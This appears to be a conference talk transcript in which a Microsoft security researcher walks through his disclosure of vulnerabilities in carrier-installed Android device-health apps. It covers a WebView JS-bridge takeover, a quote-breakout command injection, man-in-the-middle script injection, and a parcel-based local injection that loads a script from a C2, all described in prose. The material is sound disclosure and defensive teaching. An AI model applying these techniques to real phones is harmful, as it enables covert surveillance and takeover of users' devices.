So our next speaker is Jonathan Bar Or on how getting a free phone got me to report critical vulnerabilities affecting millions of Android devices. I am so glad you did that. Thank you. Jonathan Bar Or, or JBO, is the Microsoft Defender Research Architect for cross-platform... blah, blah, blah. I rented these lips this morning. They're not working. Research Architect for cross-platform, focusing on macOS, Linux, Android, and iOS research. Jonathan has rich offensive security research experience on various platforms and architectures, as well as a combination of defensive skills and threat research. So without any further ado, Jonathan, take it over. You need to pick up a microphone in order to... Yeah, I know. Hold on. Turn it on. Hold on. Do I pick that up with R or L? Leave it to R. Just the left click. Jeez. All right. Can anyone hear me at all? I can. Yes, we hear you just fine. So I do have the mic right now? I think so. All right. Awesome. Let me check real quick. Doesn't look like I have the mic, but let me... Okay. I turned the megaphone on for you, so it should work. All right. Awesome. Thank you so much. So let's go to the next slide, please. Who am I? My name is Jonathan Bar Or, or JBO for short. That's my Twitter handle if you ever want to contact me. As I was introduced, I'm the Microsoft Defender Cross-Platform Research Architect. That's a very long title, but it basically means that I look at everything that does not run Windows, and that's my responsibility. I do Windows once in a while, though, especially when it comes to the things that intertwine between Windows and other operating systems, like WSL and WSA. And I released some cool blog posts this year on all of these platforms. The Chrome OS one will be released soon. Next slide, please. Well, how did this get started? I relocated to the US back in 2017, and I'm an Android user, so I relocated with the same old Android phone that I had back home.
And my carrier, who shall not be named, decommissioned 3G and transitioned into 5G, right, with all the cool stuff that it brings. And because my phone didn't support 5G, it basically became useless. So they decided to send me a free phone as compensation. And, you know, my brain started pounding, and I'm like, should I really trust them? And I decided not to trust their phone blindly and actually see what's inside — buy myself a new phone and play with the old one. Next slide, please. So when exploring a brand new phone, you can do a bunch of stuff. But first things first, you know, the easiest things: I decided to look at apps. And I discovered that there are tons of system apps there. And one of them seemed to be bundled with something called DT Ignite, which is an advertisement framework that might install new apps on your phone silently based on your browsing habits. It sounds terrible, but I'm actually not here to talk about that. I'm here to talk about something else that I discovered. So I discovered tons of stuff, but one thing in particular caught my eye, and that was something called a device health app. It's a system app and had tons of permissions. And that's our focus for today. Next slide, please. Just some background, if you're really unfamiliar with Android. Android apps are conceptually archives. They're not really archives, but you can think of them as archives. And they contain various files: resources, code, metadata, digital signatures. They're all separated by design and are basically different files. And one of the most important parts there is called the manifest, which contains metadata about the app — the app name, version, activities in it, as well as permissions. And the first thing in any Android app analysis is to examine the permissions that it has. It's saved under AndroidManifest.xml as binary data, but any basic Android analysis tool translates that XML to human-readable text. So just some background.
Next slide, please. And this is a list. I don't know how much you can see with the AltspaceVR thingy, but this is a pretty big list of what the app is capable of doing. Basically, it can access the internet, access Wi-Fi state, read phone state, read external storage, get package size, use the camera, use the fingerprints, record audio, read phone numbers. What it can do is really overwhelming, and the list goes on and on. This is just a partial screenshot. So when you look at the activities — they're also in the AndroidManifest.xml file, the thing that holds the metadata of the package — you can see that there is a main activity called com.mceMainActivity. And then there are a bunch of other things there, like the actions and so on. And the thing that caught my eye is the last two readable lines: the one that says browsable, and then the one with the Android scheme mceDigital. So this is basically the main activity, and it's browsable. Next slide, please. So, browsable activities: the app registers a new scheme called mceDigital, right? And basically, when the scheme is browsed to — this is an Android feature, right? — the main activity starts. This is, for example, how, when you open a Zoom link, Android knows to start Zoom with the right parameters. It's basically a way for an app to say, hey, I want to register that scheme, and whenever that scheme is accessed, please, please wake me up. And this is the first obvious foothold for a logical remote code execution. Mentally, that's how I imagine it in my mind. And sometimes an attacker can pass malicious data with the scheme that will be parsed by the activity — a buggy scheme, URL GET parameters, info. And the next analysis goal for me was: well, what does the app do once it launches through the scheme? And can I give it any meaningful input, right, from the URL that's being accessed? Next slide, please.
Something about web views, if you've completely been living under a rock in the Android world. In Android, web views are basically components that can parse and present web content, including JavaScript capabilities. So they're almost mini browsers, if you will. They're useful for app developers, especially for cross-platform engines that use them extensively. So if you want to write an app and make it available on Android and iOS, you can use that; frameworks like React will do that. A web view is a component that will be used extensively, actually, to run that app. And a lot of apps rely on web views — that's not very new. And a security question arises: because a lot of apps rely on web views, granting the web view capabilities to do certain things is quite problematic. Think of unlimited file access from something that behaves like a browser, right? And there are plausible scenarios where an attacker could inject malicious code into the web view. So the question is, how does Android solve this problem? Next slide, please. And this is achieved by something called an Android JS bridge. An app has a web view, and it can declare a JavaScript interface and attach it to the web view. And from that point on, the web view can actually invoke methods in the app through that interface and get responses back. The data that can be sent is limited to primitive data types in the Java virtual machine. And this is what's called an Android JS bridge. Next slide, please. This is a toy example of an Android JS bridge. In the first part, you can see Java code that will run in the app on the Android device. You can see that I declare a class called JSInterface. I have to add something called @JavascriptInterface — that's an annotation on a method. And then the method actually just adds two numbers. So nothing scary here.
And you can see that I had to do two other things. Given a web view, I had to basically enable JavaScript. Then I add the JavaScript interface with an instance of that class that I just defined, and expose it under a name — in this case, I expose it under someName. And then the web view can run JavaScript; that's the lower part of the page here. And it will basically invoke window.someName.addNumbers, just like that. And the parameters and everything will be sent from the web view to the Android app and then invoked, and I can also get the result. So this is how you add two numbers with an Android JS bridge. Next slide, please. So, only methods — this is just a little more background on Android JS bridges — only methods that are annotated with the @JavascriptInterface annotation (you've seen that one or two slides ago) can be invoked, starting at API level 17, which is ages ago. Otherwise, you get this funny vulnerability where the web view can do window.someName.getClass(), Class.forName, whatever — you can basically reach the Runtime.exec method. This happened around 2014 or so. So very, very old, and you can't do that anymore starting at API level 17. And therefore, what I'm trying to say is that an analysis of a JS interface should examine the methods that are annotated with @JavascriptInterface. So this is kind of like background on why I'm doing what I'm doing. Next slide, please. If we're going back to my app analysis, we have the health app, right? And the health app is browsable. And one thing that I discovered is that it also has a web view called JarvisWebView. That's how they expose it to the... actually, not expose it — this is how they declare it in the classes there. And the web view has an attached JavaScript interface called JarvisJSInterface. That's just the name that they expose.
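To make the toy example concrete, here is a minimal sketch of the page side of that bridge call. In a real WebView, Android injects the bridge object after addJavascriptInterface(); here the object is stubbed so the snippet runs standalone, and the name someName is the assumed exposure name from the example.

```javascript
// Minimal sketch of the page side of an Android JS bridge call.
// In a real WebView, Android injects the bridge object automatically after
// addJavascriptInterface(obj, "someName"); here we stub it so the snippet
// runs standalone. "someName" is an assumption from the toy example.
const window = {
  someName: {
    // Stub mirroring the @JavascriptInterface-annotated Java method.
    addNumbers: (a, b) => a + b,
  },
};

// Page JavaScript inside the WebView would simply call:
const sum = window.someName.addNumbers(2, 3);
console.log(sum); // 5
```

The key point is that, to the page, the bridge looks like an ordinary JavaScript object, which is exactly why injected page code gets to call it too.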
And the interfaces can be accessed from within the web page via the JavaScript bridge to invoke accessible methods. And one remark is that they're notorious for trust issues, right? In many cases, the app blindly trusts the web view's input. Next slide, please. This is kind of like a code blurb of the annotated methods that I found — well, three of the four methods, and I'll explain why I added the third one even though it's not annotated. The first one is called init. It gets a string, and it basically saves something that I, while reversing, just called a callback name. The second one is called request. It gets a string, and it calls super.request with that string. The third one is called sendResponse, and it's not annotated, so you can't really access it from the web view. And the fourth one is called closeWindow, which is not very interesting, and I'm just not going to talk about it at all. Slide, please. From a software design perspective, the JarvisJSInterface that we saw in the app works as an asynchronous server to the JavaScript client. It gets requests through the methods that I've just shown you and returns callbacks by injecting JavaScript back into the web view. This kind of explains the stuff that we saw earlier. Init basically gets a string and saves it; that string is going to be used later as a callback JavaScript function for the client. CloseWindow is not very interesting. And request serves requests from the JavaScript client. And this also explains the response method that we saw earlier. Would you actually mind going back one slide? Is that possible? Awesome, thank you. The sendResponse method that we saw is going to be invoked later by the app when it's ready to send a response. And if you can see the code there — I know it's a bit difficult — it's going to build a URL that starts with javascript: and add some JavaScript code there.
That also includes the callback name, by the way. And it basically injects it with loadUrl — that's the last line in the third method here. Next slide, and then next slide again. The request method actually invokes the superclass's request, and the superclass of JarvisJSInterface is just called ServiceTransport. And after some unimportant tasks, I examined what it does. It will treat the input string as a JSON object, and it extracts some members from it. Those are the four members. First of all, there is context, which I think of as a request ID. Basically, in an asynchronous model, when you have a client and a server, there needs to be some way of tracing requests, so the client supplies a request ID. That's the context. Service is a service name; more on that later. Command is an integer — effectively, a command number. And data is effectively the arguments that are sent with that command. Next slide, please. And, you know, when you start to take a look at the services that are implemented — again, let me remind everyone, if I have malicious code that runs in the web view, I can basically invoke the JarvisJSInterface methods. One of them is called request, and with request, I can actually invoke services. And what does that mean? So I started reverse engineering that thing. And there are many services that get registered in a global table. I won't bore you with the gory details too much, but basically, there is a global table that is saved, and each service declares its exposed methods, maps them to command numbers, along with the argument names and types it expects. And the entire request is translated on the fly with Java reflection. And each service can also invoke the sendResponse method that we saw earlier to actually return a response to the client. Next slide, please.
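Putting the four members together, a request crossing the bridge would look something like the envelope below. The field names come from the talk; the helper function and the example values are assumptions for illustration.

```javascript
// Hypothetical request envelope with the four members that the superclass
// (ServiceTransport) extracts from the JSON string it receives. Field names
// follow the talk; the helper and example values are assumptions.
function buildRequest(service, command, data, context) {
  return JSON.stringify({
    context, // request ID, for tracing in the asynchronous model
    service, // service name, e.g. "camera"
    command, // integer command number within that service
    data,    // arguments object sent along with the command
  });
}

// What the page-side client would hand to the bridge's request() method:
const raw = buildRequest("camera", 1, { cameraId: "0" }, "req-1");
const parsed = JSON.parse(raw);
```

Because the whole envelope travels as one string through the bridge, it stays within the primitive-types limitation mentioned earlier.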
Some of the invocable services that I saw — this is a very partial list of interesting services that are accessible from the web view. One of them is audio: you can control audio on the phone, including peripheral volumes and stuff like that. Camera: you can take silent camera pictures. Connectivity: you can basically control Wi-Fi, Bluetooth, NFC, and whatnot. Device controls many aspects of the device — I also found a command injection there, more on that later. Location: you can access GPS and whatnot. Package manager: you can control packages, you can install new apps — which, by the way, because you're a system app, you can do silently. So, not great. So, basically, my understanding is that whoever controls the JavaScript controls the device. If you're able to get malicious JavaScript code into the web view, you basically win, because it can do all of those things and many, many more. Next slide, please. This is an example of the camera service. This is actually how the code looks, after some pretty-printing by me. All services must implement something called setServiceMethodsMap — that's what I referred to earlier as registering their own methods. And you can see that there are two methods exposed here. One of them is getCameraList, and the other one is captureStillImageNoPreview. getCameraList gets no arguments, and captureStillImageNoPreview gets one argument, which is called cameraId, and it's a string. And there is another class called IPC, which maps the method names to the actual numbers. So, method number zero is getCameraList, and method number one is captureStillImageNoPreview. That's just an example of how a service looks, and then the service can implement those methods however it sees fit. Next slide, please. Well, one of the methods in the device service specifically — this is just a command injection that I found. I mentioned that two slides ago.
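The register-then-dispatch scheme can be sketched like this. The method names and command numbers mirror the camera service from the talk, but the table shape and the dispatcher are assumptions, not the framework's actual code.

```javascript
// Sketch of a service method map: command numbers mapped to method names and
// the argument names each expects, mirroring the camera service from the talk
// (0 = getCameraList, 1 = captureStillImageNoPreview). The dispatcher resolves
// the implementation by name, reflection-style.
const cameraMethodMap = {
  0: { name: "getCameraList", args: [] },
  1: { name: "captureStillImageNoPreview", args: ["cameraId"] },
};

function dispatch(methodMap, impl, command, data) {
  const entry = methodMap[command];
  if (!entry) throw new Error("unknown command " + command);
  // Pull the declared arguments out of the request's data object.
  return impl[entry.name](...entry.args.map((a) => data[a]));
}

// Fake implementation standing in for the real camera service:
const fakeCamera = {
  getCameraList: () => ["0", "1"],
  captureStillImageNoPreview: (cameraId) => "captured:" + cameraId,
};

const cams = dispatch(cameraMethodMap, fakeCamera, 0, {});
const shot = dispatch(cameraMethodMap, fakeCamera, 1, { cameraId: "0" });
// shot === "captured:0"
```

The security takeaway is that any JavaScript running in the web view can reach every entry in every registered map simply by picking a service name and a command number.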
One of the methods gets an activity name and tries to stop it by running the following command: am force-stop "<activity name>". And guess what happens when the activity name itself contains quotation marks. So, surprise, surprise: if the activity name has quotation marks in it, you can basically run arbitrary commands, right? So, this is a command injection. Just in case I wanted to take control of the device even further, this would basically allow me — if I'm able to run malicious code in the web view — to inject arbitrary commands that run as the device health app, which, again, is a system app. So, this is just one minor thing that I found. Slide, please. At this point, I was pretty convinced that, you know, this is big. And I assumed that a JavaScript injection into the web view is possible somehow. If we assume that, we can control the phone with all the services, and we can abuse the command injection or simply do other fun stuff, like taking camera snapshots, turning on the microphone — all the fun stuff that you see in the movies. So, you have to do this kind of mental exercise. And I was like, this is too good not to inject into. There must be a way. So, even before I was sure I could inject into the web view, I basically implemented my own exploit, which is kind of a post-exploitation stage, if you think about it, because you still have to inject into the web view first. And this is what I did. Next slide, please. This is kind of like the post-exploitation code. You basically implement just the thing that the web view is supposed to implement, right? So, basically, create some map. I created a C2 just for us to have fun, and you can invoke that with Ajax. And you can set the callback — if you look at the last part, it says window.responseCallback equals whatever. And then you can actually call the bridge and initialize it with whatnot. Next slide, please.
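To illustrate the quoting bug, here is a sketch of the string the app effectively builds. The template is reconstructed from the talk's description, not from the decompiled code, so treat the exact shape as an assumption.

```javascript
// The activity name is spliced between double quotes with no sanitization,
// so a name that closes the quote early smuggles in an extra shell command.
function buildStopCommand(activityName) {
  return 'am force-stop "' + activityName + '"';
}

// A benign name stays safely inside the quotes:
const benign = buildStopCommand("com.example.app");
// am force-stop "com.example.app"

// A name containing quotes escapes them and appends a second command:
const evil = buildStopCommand('x"; touch /tmp/pwned; echo "');
// am force-stop "x"; touch /tmp/pwned; echo ""
```

When a string like `evil` reaches a shell, everything between the smuggled quotes runs as its own command, with the system app's privileges.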
And this is kind of like generic code for the sendRequest part. This actually sends a request to the web view — to the JS bridge, sorry. And this makes everything very simple, because now, if you look at the right part, you will see that this is basically how you run stuff from the web view, if you could inject into it. You basically do exploit = new Exploit(), and then exploit.getCameraList(), exploit.storage, do whatever, and so on. You can just invoke those methods freely. As I said, you can basically control the phone. So, I prepared that, and I basically patched the app just to see that it works, and it works well. Next slide, please. Kind of a mid-talk summary, because we've been through a lot. We have a system app. That system app is pre-installed on the phone, and it has a remotely invocable main activity through a browsable activity, right? The mceDigital thing. The activity loads a web view that — if injected into, and I put a strong emphasis on if — can essentially take over the phone. And we can build exploit code that does just that. But can we really inject into the web view? That's the question that I had in mind. And that's the million-vulnerable-Android-devices question. Next slide, please. Well, on the first attempt to inject, I discovered that the page that is loaded into the web view is actually embedded in the app itself as an asset. A web view, just like a normal browser, can load stuff over HTTP, or it can load stuff from a file:// URL, like an asset, and that's what happens in this case. And the JavaScript code that runs on the page is quite obfuscated and was extremely long — like 100k lines long. And at this point, by the way — I did forget to mention — it became too big for me, and I'm like, okay, let's involve our Android team, because why not?
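The wrapper described above can be sketched roughly like this. The bridge is stubbed so the snippet runs standalone, and the service/command numbers follow the camera example from earlier; everything else is an assumption about the talk's exploit code, not a copy of it.

```javascript
// Sketch of the "post-exploit" wrapper: each phone capability becomes a
// method that serializes a request envelope and hands it to the JS bridge.
// On-device the bridge would be the injected JarvisJSInterface; here it is
// a stub that records requests.
class Exploit {
  constructor(bridge) {
    this.bridge = bridge;
    this.seq = 0;
  }
  sendRequest(service, command, data) {
    const context = "req-" + this.seq++;
    this.bridge.request(JSON.stringify({ context, service, command, data }));
    return context;
  }
  getCameraList() {
    return this.sendRequest("camera", 0, {});
  }
  captureStillImageNoPreview(cameraId) {
    return this.sendRequest("camera", 1, { cameraId });
  }
}

// Stub bridge that just records what would cross into the app:
const sent = [];
const exploit = new Exploit({ request: (s) => sent.push(JSON.parse(s)) });
exploit.getCameraList();
exploit.captureStillImageNoPreview("0");
```

Once such a wrapper exists, "controlling the phone" reduces to ordinary method calls, which is why the remaining question in the talk is only how to get the JavaScript into the web view.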
And I basically involved our Android V team in Defender, and we reverse engineered parts of it. But we couldn't find meaningful ways to affect the behavior from the browsable intent. So that was kind of a bummer. And the second hope that I had was a kind of person-in-the-middle story. If the app is opened and the web view loads a plain text page, I can basically inject JavaScript, just because I'm a person in the middle between the phone and the internet. And we did find several scenarios where that happens. And this is kind of a success, right? Because what you have to do now is, in my opinion, not trivial, but not impossible. Next slide, please. So the scenario for remote code execution in this case: Be a person in the middle, right? You can achieve that in numerous ways — I can open, you know, a "Starbucks Wi-Fi" on my phone or something, I can control your router, or do other stuff. Send a link to the target, or inject it into a normal plain text web page that the target just browses to, and trigger the browsable activity — the mceDigital thing — because the mceDigital browsable activity kicks in and is registered by that device health app, which is a system app that was, by the way, hidden from the UI. The app kicks in. The app loads the web view, which runs complicated logic and ends up loading more content in plain text, right? It loads stuff from external HTTP over plain text. And then I inject malicious JavaScript code into the plain text content, I run my exploit, and I basically take over the phone. So that's pretty good. Next slide, please. It sounds like our kind of fun RCE on Android is over. But one thing that got me a bit worried — or a bit intrigued — was something from the reverse engineering. I got my phone from my carrier, right?
But in all of the class names and whatnot, when reverse engineering that app, we didn't see that carrier name at all. And we suspected that there is an entire framework that was not carrier specific, right? You did see that mceDigital thing and so on. And basically — we already had an RCE and I was going to disclose it responsibly — but when assessing the number of affected devices, we decided to hunt for similar apps that might be using the same framework. And, you know, there is no shame in saying we actually just used VirusTotal. And surprisingly, we discovered numerous telcos that use the same framework. So imagine all the big telcos. I will not mention anyone because I don't want to be sued, but imagine, you know, all the big telcos in America and whatnot. I mean, this was embedded in five of them, and big ones. There seemed to be some customization per telco, so one telco might have certain features and a different telco might have others — obviously, besides the app names and logos that are used and stuff like that. And not all apps were susceptible to the person-in-the-middle attack, right? Some of them did not load external code over plain text, so the remote code execution part didn't work there. And one thing that I also discovered is that besides those five telcos, there are certain apps that use that framework that might be installed by phone repair shops or for trade-in purposes. So if it wasn't clear, the device health app is supposed to basically make sure that the camera is working, that the microphone is working — this is why it needed all of those permissions. And some of those telcos pre-installed it in the firmware, right? That's what I got initially. But we also discovered that there is a specific app that can be installed by repair shops, and sometimes they forget to uninstall the app after you get your phone back from being fixed and whatnot. So this is another issue that we saw.
Users, in this case — either because the app is baked into the firmware, or because you got your phone fixed and someone installed an app unbeknownst to you — were always, to the best of my knowledge, unsuspecting that this thing even existed. Next slide, please. So we decided to dig deeper and see if we could exploit the apps that were not susceptible to the person-in-the-middle JavaScript injection. And eventually, we found a local JavaScript injection. And this is like... I won't actually wait for responses, but the question is, can you spot the injection opportunity on the next slide? So this code is taken from multiple methods, but the injection part actually resides in the last part, the third part. Basically, what's going to happen here is that you get some parameter called flow input — I'll mention what it does in a sec. This flow input is going to be sent to the web view's init function. The init function is going to check whether it's empty, and if it's not empty, it's going to save it in a member. And later, that member, if it's not empty, is going to be loaded into the web view with loadUrl again — just like the JavaScript injection that we saw earlier. Next slide, please. This is what I mentioned: there is a member called mFlowSDKInput. By the way, I have no idea what it's supposed to do; I never saw it actually being used. But the member exists, and the member is a JSON object, stringified and perfectly injected into the web view, as we saw. The interesting part — and this is where the injection kicks in — is that there is no string sanitization on the string itself, which means that we could control that member, right? And if I can control that member, I can actually inject JavaScript into the web view locally.
And the member is initialized very indirectly — there are four or five different classes involved — by the intent that creates the app. Interestingly, it comes from a Google Firebase parcel. It doesn't really matter that much, but it's funny to me. Next slide, please. I did have one pesky limitation: the entire payload — because we're talking about a JSON object that's going to be turned into a string and then injected into the web view as JavaScript — can't contain new lines, because of the JSON stuff. But you can easily overcome that with eval, atob, and a base64-encoded payload. So, if you have a payload, you can just turn it into base64, and then add some code to unwrap it — the entire base64 thing. And basically, this is how you run JavaScript code in one line, right? Which is not a big thing, but still. Next slide, please. Oh, this has a nice PowerPoint animation — kudos to me. On the left side, you can see the app itself. In the middle part, you can see the web view. And on the right, there is an attacker, right? And basically, what's going to happen is — can you click one time, please? — I prepared the second-stage JS loader. That's the first part: the payload that I assumed I could inject. So, I have that code. And then, next click, please. I wrap it with eval(atob(...)) and base64, just to make it a one-liner. Next, please. I wrap it into a member that is called dynamic — this is how Google Firebase works in this case. Next one, please. I wrap it into something called a parcel, which is how objects are serialized in Android. Next, please. This thing is turned into bytes, because intents can just contain bytes. Next one, please. Then, I wrap it into an intent.
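The one-liner trick can be sketched as follows, using Node's Buffer in place of the browser's btoa() and a toy multi-line payload; the payload content is invented for illustration.

```javascript
// The injected payload can't contain newlines (it travels inside a
// stringified JSON member), so a multi-line second stage is base64-encoded
// and unwrapped at runtime with eval(atob(...)).
const secondStage = 'var a = 1;\nvar b = 2;\nconsole.log(a + b);';

// Buffer stands in for the browser's btoa() so this runs under Node:
const b64 = Buffer.from(secondStage, "utf8").toString("base64");
const oneLiner = "eval(atob('" + b64 + "'))";

// The wrapped payload survives the injection because it is a single line:
console.assert(!oneLiner.includes("\n"));
```

Decoding `b64` gives back the original multi-line second stage, so nothing is lost by the wrapping; the WebView's eval simply reconstitutes it.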
An intent — I didn't mention it, but that's a very popular IPC mechanism in Android, and it's basically the thing that fires apps and activities and whatnot. Next click, please. So, the intent gets into the app. Next click. And then, the app unwraps it: it takes the bytes, unwraps them, takes the parcel, unwraps it, and so on. It does all of those things, and eventually, it will run the second-stage JS loader — it will load the JavaScript into the web view. Next one, please. The web view loads the JavaScript, and the web view actually loads additional JavaScript from my C2. Next one, please. It invokes client requests, right? And next one, please. It provides responses. Also, by the way, if you want to take pictures with the cameras or turn on the microphone and whatnot, this all works well. And I mentioned local injection here because, if it wasn't clear, to fire that intent with those very specific bytes inside, you have to run an app on the device and send that intent to the system app — the device health app. But this is still considered an elevation of privilege, for obvious reasons: your initial app doesn't have to have any permissions, and if you can inject and do all of those things, you can basically take over the phone. Next slide, please. This is my exploit code. I won't dive too much into it, but you can see in the first part that I take the JavaScript payload, and I add some code to embed that payload into the web view itself by inserting a new script element and loading the source from my C2. And I had to append an extra quote, and then I just put A's there for fun. The idea behind that is that this is how the JavaScript injection works, right? It takes my input and treats it as a string within quotation marks. So, if I close the quotation, I can actually inject more JavaScript there.
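The quote-escape trick can be sketched like this. The template string is invented for illustration, standing in for the real javascript: URL that the framework builds and passes to loadUrl.

```javascript
// The app splices the attacker-controlled string into injected JavaScript
// inside single quotes with no sanitization, so a payload that closes the
// quote early runs arbitrary code. buildInjectedJs() is a stand-in for the
// real loadUrl("javascript:...") construction, and handleFlowInput is a
// hypothetical function name.
function buildInjectedJs(flowInput) {
  return "javascript:handleFlowInput('" + flowInput + "')";
}

// Close the quote, run our code, then pad with A's so the template's
// trailing quote and parenthesis still parse:
const payload = "'); doEvilStuff(); ('AAAA";
const injected = buildInjectedJs(payload);
// javascript:handleFlowInput(''); doEvilStuff(); ('AAAA')
```

The appended A's play the same role as in the talk's exploit: they soak up the template's own closing quote so the whole injected line remains syntactically valid JavaScript.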
And then basically, the second part was to encode everything into a single statement — that's just the basic base64 encoding. Next slide, please. And this basically... Oh, and on the previous slide — sorry, can you go one slide back? I apologize. The thing that has the red rectangle is where the injection kicks in. You basically have to put a single quote, right? This is where the JavaScript injection actually kicks in — the flow input member that we discussed. Sorry, now next slide. This continues building the entire thing. I build something called a dynamic link data, and in that dynamic link data, the only thing that was actually meaningful was building it eventually as a parcel. And then I have to marshal the parcel — it turns into bytes, and then those bytes are embedded in the intent itself as com.google.firebase.dynamiclinks.DYNAMIC_LINK_DATA. That's the last part right here. Next slide, please. This is a recording of the local injection. I hope it plays well. Can you please try to play it? Let's see how that works. Okay. So, on the left side, you can see the two... we actually had two C2 servers, for other reasons. And on the right side, you can see the checkup app. And this is our PoC app that injects into the system app. The system app, by the way, doesn't have to be running — I just turned it off, and that's fine, it doesn't really matter, because we can always start an intent. This will basically fire the intent. And on the left side, you can see that it actually starts getting data, right? So, this is basically how our exploit works. This is our recording. Next slide, please. Okay. Responsible disclosure. We disclosed everything to the company that maintains the framework itself — the entire SDK — as well as all the telcos that were involved. There were five in total. I can't give an exact number.
But we're talking about millions of Android devices with vulnerable system apps, affected by bugs ranging from full RCE to local EoP. And it took many months, actually. This is quite problematic: you can't really even remove system apps from your Android phone — at least users like my grandma can't do that. And we basically released details in coordination with everyone involved to make sure that no end user was put in danger, because releasing new firmware and making sure that everyone updates is very painful for those telcos. And we also constantly work together with Google to improve Google Play Protect and spot similar bugs automatically. This is kind of interesting: those device health apps — that SDK, actually — were in Google Play, and it still is, by the way, in the Google Play Store. And Google Play has something called Google Play Protect, which scans your apps for malice and also for vulnerabilities. But they simply didn't have good handling of that vulnerability class — vulnerabilities that involve JS interfaces. So we are working with Google on that. Next slide, please. Resolution. So disclosure happened around September 2021, but it took more than six months until user risk became sufficiently low for public disclosure. And this is just my take on the thing. One of the main problems is that those were system apps, right? I don't want to use the term bloatware, but I already used it, so let's call it bloatware. System apps are baked into the device firmware image. You can't turn them off, and there are many unsuspecting users. I'm willing to bet that if some of you are Android users, you don't know at least 30% of the system apps that are installed on your phone at any given time. And basically — me working at Microsoft on Defender — we also have Microsoft Defender on Android, and we support something called vulnerability management, which does indicate the existence of vulnerable apps.
So if you have a vulnerable app on your phone, and specifically that set of vulnerabilities, we'd be able to at least tell you. So, you know, you can't uninstall the system app, but that's a good start, I think. Next slide, please. A quick note for Android developers. Overpowered web views with JS interfaces are the source of many interesting security bugs. And apps, as I mentioned before, sometimes just blindly trust input from the web views, right? You have a web view and you have your app, and the app simply trusts it without considering whether it could be injected into or not. And that's one thing. So whenever you develop an app, be mindful of those things. If you're implementing an asynchronous client-server module via JavaScript injection, please don't do that. It's really bad practice, and there are good APIs included in AndroidX, the WebMessageListener specifically. Google pointed that out, and we actually looked at that code. And the entire serialization there is, in my opinion, pretty flawless, unlike injecting JavaScript and not sanitizing your strings. So use the provided API and don't develop something from scratch. And again, and this is a recurring theme in cybersecurity, if you're forced to inject JavaScript, sanitize your inputs. That should be obvious. Next slide, please. These are kind of the conclusions. System apps, in my opinion, do not get enough attention from the security industry. They're especially bad because they can't be easily removed. End users never suspect they have all these apps to begin with. Bloatware, that's what some of us call them. I did mention other suspicious-looking bloatware apps that were also installed on that phone. But no, I didn't pay too much attention to them. I just really need to find the time, to be honest. But I bet there are other things in that phone as well.
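To make the "sanitize your inputs" point concrete, here is a minimal sketch in plain Java of escaping an untrusted string before embedding it in an injected JavaScript snippet. This is my own illustration, not an Android or mce API: `escapeForJsString` and `handleMessage` are hypothetical names, and the better fix, as noted above, is to avoid injection entirely and use AndroidX's `WebMessageListener`.

```java
// Sketch: sanitizing untrusted input before building an injected JS string.
// Without this, input like  ");alert(1);//  breaks out of the string literal
// and runs attacker-controlled code inside the WebView.
public class EscapeJs {
    // Escape every character that could terminate a JS string literal
    // or close the surrounding script context.
    static String escapeForJsString(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '\\': out.append("\\\\"); break;
                case '"':  out.append("\\\""); break;
                case '\'': out.append("\\'");  break;
                case '\n': out.append("\\n");  break;
                case '\r': out.append("\\r");  break;
                case '<':  out.append("\\u003C"); break; // neutralizes </script>
                default:
                    if (c < 0x20) { // other control characters
                        out.append(String.format("\\u%04X", (int) c));
                    } else {
                        out.append(c);
                    }
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String untrusted = "\");alert(1);//"; // classic breakout attempt
        // The escaped value stays inside the string literal when injected.
        String js = "handleMessage(\"" + escapeForJsString(untrusted) + "\");";
        System.out.println(js);
    }
}
```

Even with escaping, string-building JavaScript stays fragile, which is why the serialization done for you by `WebMessageListener` is the safer design.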
And there are special thanks here to the Android team that worked with me, which includes Shengxin Zhang, Michael Peck, Joe Mancer, and Apoorva Kumar, and the entire Microsoft 365 Defender research team. And with that, I'm done. If you have any questions, please do ask them now, or you can just reach out over Twitter or something. My DMs are open. Thank you so much for attending. I have a question. Yes. So this device health app, is it one of those system apps that come with Android, or is it one of those carrier system apps, the kind you get from that specific carrier? So, it's actually, well, it's not done by Google or by... Yeah, it's more of the latter than the former. Although, as I said, you can actually install it from Google Play, or if you ever get your phone fixed or traded in or something, it might be installed there already. So it can be either someone installing it, or it could be baked into your firmware by the carrier itself. I hope that answers the question. Okay, yes. What's the carrier part of it? Yeah, that's why I mentioned those telcos. It's done, well, not by the telcos themselves. They're actually just using that other company that developed the SDK, with customization. But basically, the telcos are kind of responsible for it in this case. Okay. Some... Go ahead. I'm just trying to think about those kinds of exploits. You know how you need root to remove the system apps and stuff? I was thinking, how actually... I mean, if you run as root, yes, you can uninstall those system apps. I mean, does the exploit have any practical use for other things? Other things, you know, or just threat actor stuff? I mean, generally, those kinds of exploits could mostly be used, in my opinion, for bad stuff. Could be like an NSO-level exploit where someone can just remotely hack your phone.
Also, because it's a system app, in most cases it can actually install apps silently, whereas a normal app, if it tries to install an app, would pop up and at least ask the user for permission. But as far as I remember, not for system apps. And I mean, it's hard for me to say. Exploits are usually used either by bad guys or for educational purposes. In this case, we actually... Yeah, go ahead. Yeah, because I know sometimes those exploits are used as part of an exploit chain. Oh, you mean like for jailbreaking and stuff like that? Yeah, that's what I'm saying. The difference between the exploits, is it the kind that can also be used for that? Or is it mostly just for the really, really bad stuff? Well, to be honest, I think mostly not for that. I mean, for a jailbreak, you'd normally have to run as root, or flash a new bootloader or whatnot. This is not that kind of exploit. This exploit, I mean, it is beneficial in some cases to run as a system app, but it's not running as root. Oh, okay. Yeah, so it's not really useful for that kind of stuff. More so just... Oh, it's mostly for bad guys. Yeah, that's what I was asking. Thank you. Any more questions? I wanted to ask, oftentimes I've heard horror stories of people revealing vulnerabilities to big companies and getting negative responses. Did you get any kind of negative response from big telco companies when you revealed to them that there's this kind of vulnerability in their product? Good question. This is kind of a political question, so it's hard for me to answer, but I would say that the responses were mixed. I think that the telco industry is not as mature as other industries, and they might not see you exploiting their stuff as a nice gesture, even though we really worked hard to do responsible disclosure. We also...
